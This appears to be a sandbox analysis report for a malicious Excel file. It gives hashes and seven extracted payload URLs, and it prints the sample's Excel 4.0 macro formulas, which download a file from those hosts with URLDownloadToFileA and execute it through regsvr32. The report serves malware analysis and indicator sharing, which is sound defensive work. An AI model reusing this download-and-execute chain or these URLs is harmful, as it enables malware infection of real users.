Static task
static1
Behavioral task
behavioral1
Sample
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx
Resource
win10v2004-20240802-en
General
-
Target
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647
-
Size
42KB
-
MD5
50d2bd5ff25e514cd75373a1bc44c01f
-
SHA1
7191911374d17df365586d778e803f9cfdaef4a1
-
SHA256
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647
-
SHA512
efdf46325990a2575d86f483d673dfbed6dc76c7de9a9841cc15bda77421170da1842f67c0660397b05b50468301eaafee8f2b69b5eb5a3bb96f1b17398e8361
-
SSDEEP
768:8CwaDFg6ixC1AVbl6fGeXZXjHQTV2LFHVBzcR0P+664n3NxCBs:pwaCpCTfJX9jwe1BwGPDzxCBs
Malware Config
Extracted
http://www.agretto.com/Template/ziasuz5w8pS08Gm2/
http://www.agnesleung.com/raw.backup/j4ry/
https://lifebotl.com/Response/WllkQWM/
https://livejagat.com/h/SjpRvD/
http://185.187.70.35/wordpress_bo/srvoaI2MBFc/
http://188.166.245.112/sipadu/eFi8UiJETZiK1FB/
http://103.85.95.5/v1/uploads/87DtpAEZULSccOn/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/ziasuz5w8pS08Gm2/","..\wn.ocx",0,0) =IF('KEFGK'!E7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/j4ry/","..\wn.ocx",0,0)) =IF('KEFGK'!E9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lifebotl.com/Response/WllkQWM/","..\wn.ocx",0,0)) =IF('KEFGK'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/SjpRvD/","..\wn.ocx",0,0)) =IF('KEFGK'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.187.70.35/wordpress_bo/srvoaI2MBFc/","..\wn.ocx",0,0)) =IF('KEFGK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.187.70.35/wordpress_bo/srvoaI2MBFc/","..\wn.ocx",0,0)) =IF('KEFGK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://188.166.245.112/sipadu/eFi8UiJETZiK1FB/","..\wn.ocx",0,0)) =IF('KEFGK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://103.85.95.5/v1/uploads/87DtpAEZULSccOn/","..\wn.ocx",0,0)) =IF('KEFGK'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wn.ocx") =RETURN()
Signatures
Files
-
3f3fba614ffdadd7ed4b25f4d3d7cc51d8e89540f20ff9c0e584ae79c8db1647.xlsx office2007